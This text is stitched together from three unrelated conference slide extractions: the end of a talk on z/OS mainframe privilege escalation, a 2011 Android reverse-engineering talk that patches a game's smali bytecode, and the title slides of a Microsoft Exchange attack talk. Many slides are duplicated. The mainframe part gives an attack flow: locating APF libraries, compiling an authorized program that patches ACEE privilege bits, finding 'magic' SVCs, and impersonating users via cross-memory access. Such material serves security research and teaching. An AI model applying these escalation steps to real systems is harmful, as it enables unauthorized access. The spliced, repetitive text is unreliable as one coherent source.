44
How do we get into Supervisor state
APF libraires are extensions of the zOS kernel
Any program present in an APF library can request
supervisor mode
Obviously…these libraries are very well protected ! (irony)
© WAVESTONE
45
APF hunting on OMVS (Unix)
Every z/OS has an embedded POSIX compliant UNIX running (for
FTP, HTTP, etc.)
APF files have extended attributes on OMVS (Unix)
List extended attributes : ls -E
Find APF files : Find / -ext a
Add APF authorization : extattr +a file
As for setuid bit, if you alter an APF file it loses its extended attribute
© WAVESTONE
46
APF hunting on OMVS (Unix)
[DEMO APF UNIX]
© WAVESTONE
47
APF hunting on z/OS
APF libraries on z/OS are akin to directories. They do not lose their
APF attribute if we drop programs inside
They are a tad more complicated to enumerate. We need to dive
into memory
Control block to the rescue!
© WAVESTONE
48
Hunting APF on z/OS... Diving into virtual memory
PSA
CVT
ECVT
CSVT
APFA
APF
FLCCVT
0
16
EAECVT
Extended CVT
References
all major
structures
Always
starts at
virtu. addr
0
140
ECVTCSVT
Content
Supervisor
Table
APFA
228
12
8
12
FIRST
LAST
APF
APF
APF
© WAVESTONE
49
Demo ELV.APF LIST
[DEMO ELV.APF]
© WAVESTONE
50
Patching ACEE
© WAVESTONE
51
The attack flow
Write an ASM program to patch the curent security context
•
Locate the ACEE structure in memory
•
Patch the privilege bits in memory
Compile and link the program with the Authorized state
Copy it to an APF library with ALTER access
Run it and enjoy SPECIAL privileges
© WAVESTONE
52
APF
@ayoul3__
© WAVESTONE
53
[DEMO 2 ELV.APF]
© WAVESTONE
54
The theory behind this feat is not new
Mark Wilson @ich408i discussed a similar abuse of privilege using
SVC
Some legitimate products/Mainframe admins use a variation of this
technique too!
Stu Henderson alluded to critical risks of having APF with ALTER
access
© WAVESTONE
55
Supervisor Call
Supervisor Call ~ Syscalls on Linux: APIs to hand over control to
Supervisor mode
Table of 255 SVC. 0 to 200 are IBM reserved. 201 – 255 are user
defined
Some admins/products register an authorized SVC that switches
the AUTH bit and goes into Kernel mode
© WAVESTONE
56
« Magic » SVC code
© WAVESTONE
57
Call SVC to get into Supervisor mode
We do not need to launch
this program from an APF
library anymore
© WAVESTONE
58
Looking for « magic » SVC
We browse the SVC table
looking for these
instructions (and other
possible variations)
© WAVESTONE
59
Supervisor Call
[DEMO ELV.SVF]
© WAVESTONE
60
Excerpts from the Logica attack
https://github.com/mainframed/logica/blob/master/Tfy.source.backdoor
© WAVESTONE
61
A few problems though
The user’s attribute are modified => RACF rules are altered
You can be special, that does not mean you can access any app!
=> Need to figure out the right class/resource to add
RACF rules (not easy)
© WAVESTONE
62
Impersonating users
© WAVESTONE
63
ACEE
UserID
Group Name
User Flags
Privileged flag
Terminal information
Terminal ID
@ List of groups
….
….
Interesting stuff in the ACEE
Duplicate fields
To our user’s ACEE
© WAVESTONE
64
Each program or JOB is allocated a virtual address space (same as
in Windows/Linux)
Private areas can only be addressed from within the address space
All addresses spaces share some common regions that contain
system data & code: PSA, CVT, etc.
Each address space is identified by a 2-byte number : ASID (~ PID
on Linux)
Not so fast…
© WAVESTONE
65
Listing address spaces
PSA
CVT
ASVT
FLCCVT
0
16
CVTASVT
References
all major
structures
Always
starts at
virtu. addr
0
556
ASVTMAXU
516
1st ASCB
528
1st ASCB
2nt ASCB
Last ASCB
...
+16
© WAVESTONE
66
EVL.SELF
List address spaces demo
[DEMO ELV.SELF]
© WAVESTONE
67
Virtual address space layout
Shared Area
Low User Private
Extended Private
Extended Common
Common region
User region
System region
PSA
Private
8K
Virtual Address Space
16 MB
2 G
2 T
512 T
16 EB
ACEE
Private region
24K
© WAVESTONE
68
Service Request Block: schedules a routine to run on a foreign
Virtual Address Space
Cross memory mode: allows read/write access in remote @ space
using special instructions
Access Register mode: 16-set of dedicated registers that can map
each a remote @ space
Cross memory operations
© WAVESTONE
69
Cross memory operations
© WAVESTONE
70
Cross memory operations
© WAVESTONE
71
Cross memory operations
[DEMO 2 ELV.SELF]
© WAVESTONE
72
• github.com/ayoul3
• ayoul3__ | pdf |
Practice of
Android Reverse Engineering
Jim Huang ( 黃敬群 )
Developer, 0xlab
[email protected]
July 23, 2011 / HITcon
Rights to copy
Attribution – ShareAlike 3.0
You are free
to copy, distribute, display, and perform the work
to make derivative works
to make commercial use of the work
Under the following conditions
Attribution. You must give the original author credit.
Share Alike. If you alter, transform, or build upon this work, you may distribute the
resulting work only under a license identical to this one.
For any reuse or distribution, you must make clear to others the license terms of this
work.
Any of these conditions can be waived if you get permission from the copyright holder.
Your fair use and other rights are in no way affected by the above.
License text: http://creativecommons.org/licenses/by-sa/3.0/legalcode
© Copyright 2011 0xlab
http://0xlab.org/
[email protected]
Corrections, suggestions, contributions and
translations are welcome!
Latest update:July 23, 2011
Myself
was a Kaffe Developer
Threaded Interpreter, JIT, AWT for
embedded system, robustness
was a GCJ (Java Frontend for GCC)
and GNU Classpath Developer
is an AOSP (Android Open Source
Project) contributror
30+ patches are merged officially
bionic libc, ARM optimizations
Not Only
for
Cracking
(1) Sometimes, it takes __time__
to obtain source code than
expected.
Taiwanese ODM
→
(2) Post-optimizations over
existing Android applications
(3) “Borrow" something good
to produce "goods"
Background Knowledge
(and Thank you!)
• The Code Injection and Data Protection of Android,
Thinker Li @HITcon2011
• Reversing Android Malware,
Mahmud ab Rahman @HITcon2011
• My focus would be the practice.
– Hack Android applications for Beginners
Agenda
(1) Development Flow
(2) Reverse Practice
(3) Real world tasks
7
Source code
Source code
Resources
Resources
Assets
Assets
Manifest
Manifest
Key
Key
Libraries
Libraries
Create
packaged
resource
compile
Dalvik
bytecode
Create unsigned apk
Sign apk
Publish or
Test
Packaged resource file
Packaged resource file
classes.dex
classes.dex
unsigned apk
unsigned apk
signed apk
signed apk
R
R
aapt
javac
dx
apkbuilder -u
jarsigner
adb
Android Application Development Flow
APK content
$ unzip Angry+Birds.apk
Archive: Angry+Birds.apk
...
inflating: AndroidManifest.xml
extracting: resources.arsc
extracting: res/drawable-hdpi/icon.png
extracting: res/drawable-ldpi/icon.png
extracting: res/drawable-mdpi/icon.png
inflating: classes.dex
inflating: lib/armeabi/libangrybirds.so
inflating: lib/armeabi-v7a/libangrybirds.so
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
Dalvik DEX
JNI
manifest +
signature
APK content
$ unzip Angry+Birds.apk
Archive: Angry+Birds.apk
...
inflating: AndroidManifest.xml
extracting: resources.arsc
extracting: res/drawable-hdpi/icon.png
extracting: res/drawable-ldpi/icon.png
extracting: res/drawable-mdpi/icon.png
inflating: classes.dex
inflating: lib/armeabi/libangrybirds.so
inflating: lib/armeabi-v7a/libangrybirds.so
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
Name: classes.dex
SHA1Digest: I9Vne//i/5Wyzs5HhBVu9dIoHDY=
Name: lib/armeabi/libangrybirds.so
SHA1Digest: pSdb9FYauyfjDUxM8L6JDmQk4qQ=
Name: classes.dex
SHA1Digest: I9Vne//i/5Wyzs5HhBVu9dIoHDY=
Name: lib/armeabi/libangrybirds.so
SHA1Digest: pSdb9FYauyfjDUxM8L6JDmQk4qQ=
AndroidManifest
$ unzip Angry+Birds.apk
Archive: Angry+Birds.apk
...
...
inflating: AndroidManifest.xml
extracting: resources.arsc
extracting: res/drawable-hdpi/icon.png
extracting: res/drawable-ldpi/icon.png
extracting: res/drawable-mdpi/icon.png
inflating: classes.dex
inflating: lib/armeabi/libangrybirds.so
inflating: lib/armeabi-v7a/libangrybirds.so
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
$ file AndroidManifest.xml
AndroidManifest.xml: DBase 3 data file (2328 records)
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
$ file Angry+Birds/AndroidManifest.xml
Angry+Birds/AndroidManifest.xml: XML document text
$ file AndroidManifest.xml
AndroidManifest.xml: DBase 3 data file (2328 records)
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
$ file Angry+Birds/AndroidManifest.xml
Angry+Birds/AndroidManifest.xml: XML document text
Before performing reverse
engineering, let's observe how
Android system works
Android Launcher
Android Launcher
Widget
Widget
How can Launcher find widgets/activities and invoke them?
How can Launcher find widgets/activities and invoke them?
In this presentation,
Android platform 2.3.3 is selected.
In this presentation,
Android platform 2.3.3 is selected.
When installing FrozenBubble.apk
$ adb logcat -c
$ adb install -r FrozenBubble.apk
1222 KB/s (499568 bytes in 0.399s)
pkg: /data/local/tmp/FrozenBubble.apk
Success
$ adb logcat
D/AndroidRuntime( 329):
D/AndroidRuntime( 329): >>>>>>
AndroidRuntime START
com.android.internal.os.RuntimeInit <<<<<<
D/PackageParser( 60): Scanning
package: /data/app/vmdl10628918.tmp
...
APK Installation Procedure
D/AndroidRuntime( 329):
D/AndroidRuntime( 329): >>>>>> AndroidRuntime START com.android.internal.os.RuntimeInit <<<<<<
D/PackageParser( 60): Scanning package: /data/app/vmdl10628918.tmp
I/PackageManager( 60): Removing non-system package:org.jfedor.frozenbubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
D/PackageManager( 60): Scanning package org.jfedor.frozenbubble
I/PackageManager( 60): Package org.jfedor.frozenbubble codePath changed from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk; Retaining data and
using new
I/PackageManager( 60): Unpacking native libraries for /data/app/org.jfedor.frozenbubble-1.apk
D/installd( 34): DexInv: --- BEGIN '/data/app/org.jfedor.frozenbubble-1.apk' ---
D/dalvikvm( 340): DexOpt: load 54ms, verify+opt 137ms
D/installd( 34): DexInv: --- END '/data/app/org.jfedor.frozenbubble-1.apk' (success) ---
W/PackageManager( 60): Code path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
W/PackageManager( 60): Resource path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
D/PackageManager( 60): Activities: org.jfedor.frozenbubble.FrozenBubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): move /data/dalvik-cache/data@[email protected]@classes.dex ->
/data/dalvik-cache/data@[email protected]@classes.dex
D/PackageManager( 60): New package installed in /data/app/org.jfedor.frozenbubble-1.apk
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): unlink /data/dalvik-cache/data@[email protected]@classes.dex
D/AndroidRuntime( 329): Shutting down VM
D/jdwp ( 329): adbd disconnected
APK Installation Procedure
D/AndroidRuntime( 329):
D/AndroidRuntime( 329): >>>>>> AndroidRuntime START com.android.internal.os.RuntimeInit <<<<<<
D/PackageParser( 60): Scanning package: /data/app/vmdl10628918.tmp
I/PackageManager( 60): Removing non-system package:org.jfedor.frozenbubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
D/PackageManager( 60): Scanning package org.jfedor.frozenbubble
I/PackageManager( 60): Package org.jfedor.frozenbubble codePath changed from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk; Retaining data and
using new
I/PackageManager( 60): Unpacking native libraries for /data/app/org.jfedor.frozenbubble-1.apk
D/installd( 34): DexInv: --- BEGIN '/data/app/org.jfedor.frozenbubble-1.apk' ---
D/dalvikvm( 340): DexOpt: load 54ms, verify+opt 137ms
D/installd( 34): DexInv: --- END '/data/app/org.jfedor.frozenbubble-1.apk' (success) ---
W/PackageManager( 60): Code path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
W/PackageManager( 60): Resource path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
D/PackageManager( 60): Activities: org.jfedor.frozenbubble.FrozenBubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): move /data/dalvik-cache/data@[email protected]@classes.dex ->
/data/dalvik-cache/data@[email protected]@classes.dex
D/PackageManager( 60): New package installed in /data/app/org.jfedor.frozenbubble-1.apk
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): unlink /data/dalvik-cache/data@[email protected]@classes.dex
D/AndroidRuntime( 329): Shutting down VM
D/jdwp ( 329): adbd disconnected
Android Runtime performs init
Android Runtime performs init
Package Manager detects APK and installs
Package Manager detects APK and installs
DexOpt
(verify and optimize all of the classes in the DEX file)
DexOpt
(verify and optimize all of the classes in the DEX file)
Activities: org.jfedor.frozenbubble.FrozenBubble
Activities: org.jfedor.frozenbubble.FrozenBubble
I/ActivityManager( 60): Start proc org.jfedor.frozenbubble for activity
org.jfedor.frozenbubble/.FrozenBubble: pid=356 uid=10034 gids={}
I/ActivityManager( 60): Displayed org.jfedor.frozenbubble/.FrozenBubble: +2s899ms
Execute FrozenBubble
from Android Launcher
$ adb shell am start \
-e debug true \
-a android.intent.action.MAIN \
-c android.intent.category.LAUNCHER \
-n org.jfedor.frozenbubble/.FrozenBubble
Starting: Intent
{ act=android.intent.action.MAIN
cat=[android.intent.category.LAUNCHER]
cmp=org.jfedor.frozenbubble/.FrozenBubb
le (has extras)
Execute FrozenBubble
$ adb shell dumpsys | grep -i bubble
name=org.jfedor.frozenbubble/org.jfedor.frozenbubble.Froz
enBubble
Intent { act=android.intent.action.PACKAGE_ADDED
dat=package:org.jfedor.frozenbubble flg=0x10000000 (has
extras) }
* TaskRecord{40744ad0 #4 A org.jfedor.frozenbubble}
affinity=org.jfedor.frozenbubble
intent={act=android.intent.action.MAIN
cat=[android.intent.category.LAUNCHER] flg=0x10200000
cmp=org.jfedor.frozenbubble/.FrozenBubble}
realActivity=org.jfedor.frozenbubble/.FrozenBubble
...
ActivityManager
• Start new Activities and Services
• Fetch Content Providers
• Intent broadcasting
• OOM adj. Maintenance
• ANR (Application Not Responding)
• Permissions
• Task management
• Lifecycle management
ActivityManager
• starting new app from Launcher:
– onClick(Launcher)
– startActivity
– <Binder>
– ActivityManagerService
– startViaZygote(Process.java)
– <Socket>
– Zygote
Use JDB to Trace Android Application
#!/bin/bash
adb wait-for-device
adb shell am start \
-e debug true \
-a android.intent.action.MAIN \
-c android.intent.category.LAUNCHER \
-n org.jfedor.frozenbubble/.FrozenBubble &
debug_port=$(adb jdwp | tail -1);
adb forward tcp:29882 jdwp:$debug_port &
jdb -J-Duser.home=. -connect \
com.sun.jdi.SocketAttach:hostname=localhost,port=29882 &
JDWP: Java Debug Wire Protocol
JDWP: Java Debug Wire Protocol
In APK manifest, debuggable=”true"
In APK manifest, debuggable=”true"
JDWP: Java Debug Wire Protocol
JDWP: Java Debug Wire Protocol
JDB usage
> threads
Group system:
(java.lang.Thread)0xc14050e388 <6> Compiler cond. Waiting
(java.lang.Thread)0xc14050e218 <4> Signal Catcher cond. waiting
(java.lang.Thread)0xc14050e170 <3> GC cond. waiting
(java.lang.Thread)0xc14050e0b8 <2> HeapWorker cond. waiting
Group main:
(java.lang.Thread)0xc14001f1a8 <1> main running
(org.jfedor.frozenbubble.GameView$GameThread)0xc14051e300
<11> Thread10 running
(java.lang.Thread)0xc14050f670 <10> SoundPool running
(java.lang.Thread)0xc14050f568 <9> SoundPoolThread running
(java.lang.Thread)0xc140511db8 <8> Binder Thread #2 running
(java.lang.Thread)0xc140510118 <7> Binder Thread #1 running
> suspend 0xc14051e300
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
> suspend 0xc14051e300
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
DDMS = Dalvik Debug Monitor Server
DDMS = Dalvik Debug Monitor Server
(JDB)
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
(JDB)
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
hierarchyviewer: Traverse widgets
Figure out the association between APK resources and runtime behavior.
Figure out the association between APK resources and runtime behavior.
Decompile / Disassembly
• apktool: http://code.google.com/p/android-apktool/
• dex2jar: http://code.google.com/p/dex2jar/
• Jad / jd-gui: http://java.decompiler.free.fr/
smali : assembler/disassembler for Android's dex format
• http://code.google.com/p/smali/
• smali: The assembler
• baksmali: The disassembler
• Fully integrated in apktool
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
Java bytecode vs. Dalvik bytecode
(stack vs. register)
public int method( int i1, int i2 ) {
int i3 = i1 * i2;
return i3 * 2;
}
method public method(II)I
iload_1
iload_2
imul
istore_3
iload_3
iconst_2
imul
ireturn
.end method
method public method(II)I
iload_1
iload_2
imul
istore_3
iload_3
iconst_2
imul
ireturn
.end method
.var 0 is “this”
.var 1 is argument #1
.var 2 is argument #2
.var 0 is “this”
.var 1 is argument #1
.var 2 is argument #2
.method public method(II)I
mulint v0,v2,v3
mulint/lit8 v0,v0,2
return v0
.end method
.method public method(II)I
mulint v0,v2,v3
mulint/lit8 v0,v0,2
return v0
.end method
this: v1 (Ltest2;)
parameter[0] : v2 (I)
parameter[1] : v3 (I)
this: v1 (Ltest2;)
parameter[0] : v2 (I)
parameter[1] : v3 (I)
Java
Dalvik
Dalvik Register frames
• Dalvik registers behave more like local variables
• Each method has a fresh set of registers.
• Invoked methods don't affect the registers of
invoking methods.
Practice: Level Up
Change initial game level
From 1 to 5 !
Disassembly
$ mkdir workspace smalisrc
$ cd workspace
$ unzip ../FrozenBubbleorig.apk
Archive: ../FrozenBubbleorig.apk
inflating: METAINF/MANIFEST.MF
inflating: METAINF/CERT.SF
inflating: METAINF/CERT.RSA
inflating: AndroidManifest.xml
...
extracting: resources.arsc
$ bin/baksmali o smalisrc workspace/classes.dex
Output
smalisrc$ find
./org/jfedor/frozenbubble/FrozenBubble.smali
./org/jfedor/frozenbubble/R$id.smali
./org/jfedor/frozenbubble/GameView.smali
./org/jfedor/frozenbubble/SoundManager.smali
./org/jfedor/frozenbubble/LaunchBubbleSprite.smali
./org/jfedor/frozenbubble/Compressor.smali
./org/jfedor/frozenbubble/R$attr.smali
./org/jfedor/frozenbubble/BubbleFont.smali
./org/jfedor/frozenbubble/PenguinSprite.smali
./org/jfedor/frozenbubble/GameView$GameThread.smali
./org/jfedor/frozenbubble/LevelManager.smali
./org/jfedor/frozenbubble/BubbleSprite.smali
./org/jfedor/frozenbubble/R$string.smali
...
Generated
from resources
org.jfedor.frozenbubble/.FrozenBubble
Output
smalisrc$ grep "\.method"
org/jfedor/frozenbubble/LevelManager.smali
.method public constructor <init>([BI)V
.method private getLevel(Ljava/lang/String;)[[B
.method public getCurrentLevel()[[B
.method public getLevelIndex()I
.method public goToFirstLevel()V
.method public goToNextLevel()V
.method public restoreState(Landroid/os/Bundle;)V
.method public saveState(Landroid/os/Bundle;)V
List the methods implemented in class LevelManager
List the methods implemented in class LevelManager
Dalvik::Types
• Base types
– I : int / J : long / S : short
– Z : boolean
– D : double / F : float
– C : char
– V : void (when return value)
• Classes: Ljava/lang/Object;
• Arrays: [I, [Ljava/lang/Object;, [[I
.method private getLevel(Ljava/lang/String;)[[B
→ private byte[][] getLevel(String data)
.method public goToNextLevel()V
→ public void goToNextLevel();
.method private getLevel(Ljava/lang/String;)[[B
→ private byte[][] getLevel(String data)
.method public goToNextLevel()V
→ public void goToNextLevel();
Dalvik::Methods
• Rich meta-information is assigned to Dalvik
methods
• Method meta-information:
– Signature
– Try-catch information
– Annotations
– Number of registers used
– Debug information
• Line numbers
• Local variable lifetime
Output
smalisrc$ grep r goToFirstLevel *
org/jfedor/frozenbubble/GameView$GameThread.smali:
invokevirtual {v2},
Lorg/jfedor/frozenbubble/LevelManager;>goToFirstLevel()V
org/jfedor/frozenbubble/LevelManager.smali:
.method public goToFirstLevel()V
That the first argument of the method invocation is “this” as
this is a non-static method.
That the first argument of the method invocation is “this” as
this is a non-static method.
GameView$GameThread.smali
.method public newGame()V
. . .
moveobject/from16 v0, p0
igetobject v0, v0,
Lorg/jfedor/frozenbubble/GameView$GameThread;
>mLevelManager:Lorg/jfedor/frozenbubble/LevelManager;
moveobject v2, v0
invokevirtual {v2},
Lorg/jfedor/frozenbubble/LevelManager;>goToFirstLevel ()V
Equals to Java:
objLevelManager.goToFirstLevel();
Equals to Java:
objLevelManager.goToFirstLevel();
LevelManager.smali
.method public goToFirstLevel()V
.registers 2
.prologue
.line 175
const/4 v0, 0x0
iput v0, p0,
Lorg/jfedor/frozenbubble/LevelManager;>currentLevel:I
.line 176
returnvoid
.end method
Equals to Java:
currentLevel = 0;
Equals to Java:
currentLevel = 0;
Equals to Java:
public class LevelManager {
...
public void goToFirstLevel() {
currentLevel = 0;
}
...
}
Equals to Java:
public class LevelManager {
...
public void goToFirstLevel() {
currentLevel = 0;
}
...
}
Constants to registers: const/4, const/16, const, const/high16,
const-wide/16, const-wide/32, const-wide, const-wide/high16,
const-string, const-class
Constants to registers: const/4, const/16, const, const/high16,
const-wide/16, const-wide/32, const-wide, const-wide/high16,
const-string, const-class
Modify constructor of
GameView::GameThread()
• Look up output in GameView$GameThread.smali
.class Lorg/jfedor/frozenbubble/GameView$GameThread;
.super Ljava/lang/Thread;
.annotation system Ldalvik/annotation/InnerClass;
accessFlags = 0x0
name = "GameThread"
.end annotation
# direct methods
.method public constructor
<init>(Lorg/jfedor/frozenbubble/GameView;Landroid/view/SurfaceHol
der;[BI)V
Modify constructor of
GameView::GameThread()
• Look up output in GameView$GameThread.smali
# direct methods
.method public constructor
<init>(Lorg/jfedor/frozenbubble/GameView;Landroid/view/SurfaceHol
der;[BI)V
Equals to Java:
class GameView ??? {
class GameThread extends Thread {
public GameThread(SurfaceHolder s,
byte[] b,
int I) {
Equals to Java:
class GameView ??? {
class GameThread extends Thread {
public GameThread(SurfaceHolder s,
byte[] b,
int I) {
GameView.smali
• Look up output in GameView.smali
.class Lorg/jfedor/frozenbubble/GameView;
.super Landroid/view/SurfaceView;
# interfaces
.implements Landroid/view/SurfaceHolder$Callback;
• Look up output in GameView$GameThread.smali
.class Lorg/jfedor/frozenbubble/GameView$GameThread;
.super Ljava/lang/Thread;
Equals to Java:
class GameView extends SurfaceView
implements SurfaceHolder.Callback {
class GameThread extends Thread {
Equals to Java:
class GameView extends SurfaceView
implements SurfaceHolder.Callback {
class GameThread extends Thread {
Implementation of GameView::GameThread()
• Check GameView::public GameThread(SurfaceHolder s, byte[] b, int I)
conststring v3, "level"
const/4 v4, 0x0
moveobject/from16 v0, v25
moveobject v1, v3
move v2, v4
invokeinterface {v0, v1, v2},
Landroid/content/SharedPreferences;
>getInt(Ljava/lang/String;I)I
moveresult p4
newinstance v3, Lorg/jfedor/frozenbubble/LevelManager;
moveobject v0, v3
moveobject/from16 v1, v22
move/from16 v2, p4 invokedirect {v0, v1, v2},
Lorg/jfedor/frozenbubble/LevelManager;><init>([BI)V
Invoke constructor of LevelManager
Invoke constructor of LevelManager
Register v1 related code
conststring v3, "level"
const/4 v4, 0x0
moveobject/from16 v0, v25
moveobject v1, v3
move v2, v4
invokeinterface {v0, v1, v2},
Landroid/content/SharedPreferences;
>getInt(Ljava/lang/String;I)I
moveresult p4
newinstance v3,
Lorg/jfedor/frozenbubble/LevelManager;
moveobject v0, v3
moveobject/from16 v1, v22
move/from16 v2, p4
invokedirect {v0, v1, v2},
Lorg/jfedor/frozenbubble/LevelManager;><init>([BI)V
Register v2 related code
conststring v3, "level"
const/4 v4, 0x0
moveobject/from16 v0, v25
moveobject v1, v3
move v2, v4
invokeinterface {v0, v1, v2},
Landroid/content/SharedPreferences;
>getInt(Ljava/lang/String;I)I
moveresult p4
newinstance v3,
Lorg/jfedor/frozenbubble/LevelManager;
moveobject v0, v3
moveobject/from16 v1, v22
move/from16 v2, p4
invokedirect {v0, v1, v2},
Lorg/jfedor/frozenbubble/LevelManager;><init>([BI)V
“0x0” is passed to LevelManager's
constructor as parameter
“0x0” is passed to LevelManager's
constructor as parameter
Recall the grep results
smalisrc$ grep "\.method"
org/jfedor/frozenbubble/LevelManager.smali
.method public constructor <init>([BI)V
.method private getLevel(Ljava/lang/String;)[[B
.method public getCurrentLevel()[[B
.method public getLevelIndex()I
.method public goToFirstLevel()V
.method public goToNextLevel()V
.method public restoreState(Landroid/os/Bundle;)V
.method public saveState(Landroid/os/Bundle;)V
Equals to Java:
public class LevelManager {
...
public LevelManager(byte[] b, int i)
Equals to Java:
public class LevelManager {
...
public LevelManager(byte[] b, int i)
Register v2 related code
conststring v3, "level"
const/4 v4, 0x0
moveobject/from16 v0, v25
moveobject v1, v3
move v2, v4
invokeinterface {v0, v1, v2},
Landroid/content/SharedPreferences;
>getInt(Ljava/lang/String;I)I
moveresult p4
newinstance v3,
Lorg/jfedor/frozenbubble/LevelManager;
moveobject v0, v3
moveobject/from16 v1, v22
move/from16 v2, p4
invokedirect {v0, v1, v2},
Lorg/jfedor/frozenbubble/LevelManager;><init>([BI)V
p4 reserve the result after method invocation.
p4 reserve the result after method invocation.
Therefore, v2 has return value of method
android.content.Shared.Preference.getInt()
Therefore, v2 has return value of method
android.content.Shared.Preference.getInt()
Modify!!!
• Check GameView::public GameThread(SurfaceHolder s, byte[] b, int I)
conststring v3, "level"
const/4 v4, 0x0
moveobject/from16 v0, v25
moveobject v1, v3
move v2, v4
invokeinterface {v0, v1, v2},
Landroid/content/SharedPreferences;>getInt(Ljava/lang/String;I)I
moveresult p4
newinstance v3, Lorg/jfedor/frozenbubble/LevelManager;
moveobject v0, v3
moveobject/from16 v1, v22
move/from16 v2, p4
invokedirect {v0, v1, v2},
Lorg/jfedor/frozenbubble/LevelManager;><init>([BI)V
Remove!
Remove!
Change value from 0x0 to 0x4
Real World Tasks
Tasks
• ODEX (Optimized DEX)
– platform-specific optimizations:
• specific bytecode
• vtables for methods
• offsets for attributes
• method inlining
• JNI
– JNIEnv
• Native Activity
• Key signing
DEX Optimizations
• Before execution, DEX files are optimized.
– Normally it happens before the first execution of code from the
DEX file
– Combined with the bytecode verification
– In case of DEX files from APKs, when the application is launched
for the first time.
• Process
– The dexopt process (which is actually a backdoor of Dalvik) loads
the DEX, replaces certain instructions with their optimized
counterparts
– Then writes the resulting optimized DEX (ODEX) file into the
/data/dalvik-cache directory
– It is assumed that the optimized DEX file will be executed on the
same VM that optimized it. ODEX files are NOT portable across
VMs.
dexopt: Instruction Rewritten
• Virtual (non-private, non-constructor, non-static methods)
invoke-virtual <symbolic method name> → invoke-virtual-quick <vtable index>
Before:
invoke-virtual
{v1,v2},java/lang/StringBuilder/append;append(Ljava/lang/String;)Ljava/lang/StringBuilder;
After:
invoke-virtual-quick {v1,v2},vtable #0x3b
• Frequently used methods
invoke-virtual/direct/static <symbolic method name> → execute-inline <method index>
– Before:
invoke-virtual {v2},java/lang/String/length
– After:
execute-inline {v2},inline #0x4
• instance fields: iget/iput <field name> → iget/iput <memory offset>
– Before: iget-object v3,v5,android/app/Activity.mComponent
– After: iget-object-quick v3,v5,[obj+0x28]
Meaning of DEX Optimizations
• Sets byte ordering and structure alignment
• Aligns the member variables to 32-bits / 64-bits
• boundary (the structures in the DEX/ODEX file itself
are 32-bit aligned)
• Significant optimizations because of the elimination
of symbolic field/method lookup at runtime.
• Aid of Just-In-Time compiler
JNI specificities can ease reversing
•1- get the function signature in Java
•2- use IDA to generate a TIL file from jni.h
•3- assign the structure to the right variable
•4- see function calls directly
•5- do the same in Hex-Rays
JNI specificities can ease reversing
•1- get the function signature in Java
•2- use IDA to generate a TIL file from jni.h
•3- assign the structure to the right variable
•4- see function calls directly
•5- do the same in Hex-Rays
Further Considerations
•
Optimizing, Obfuscating, and Shrinking your Android Applications with ProGuard
http://www.androidengineer.com/2010/07/optimizing-obfuscating-and-shrinking.html
• Missions:
– Obfuscation
– Optimizing
• ProGuard
<target name="-dex" depends="compile,optimize">
<target name="-post-compile">
<antcall target="optimize"/>
</target>
• Google's License Verification Library (LVL)
-keep class com.android.vending.licensing.ILicensingService
http://0xlab.org | pdf |
ProxyLogon
is Just the Tip of the Iceberg
A New Attack Surface on Microsoft Exchange Server!
Orange Tsai
Orange Tsai
• Orange Tsai, focusing on Web and Application 0-day research
• Principal Security Researcher of DEVCORE
• Captain of HITCON CTF Team
• Speaker of Security Conferences
• Black Hat USA & ASIA / DEFCON / HITB / HITCON …
• Selected Awards and Honors:
• 2017 - 1st place of Top 10 Web Hacking Techniques
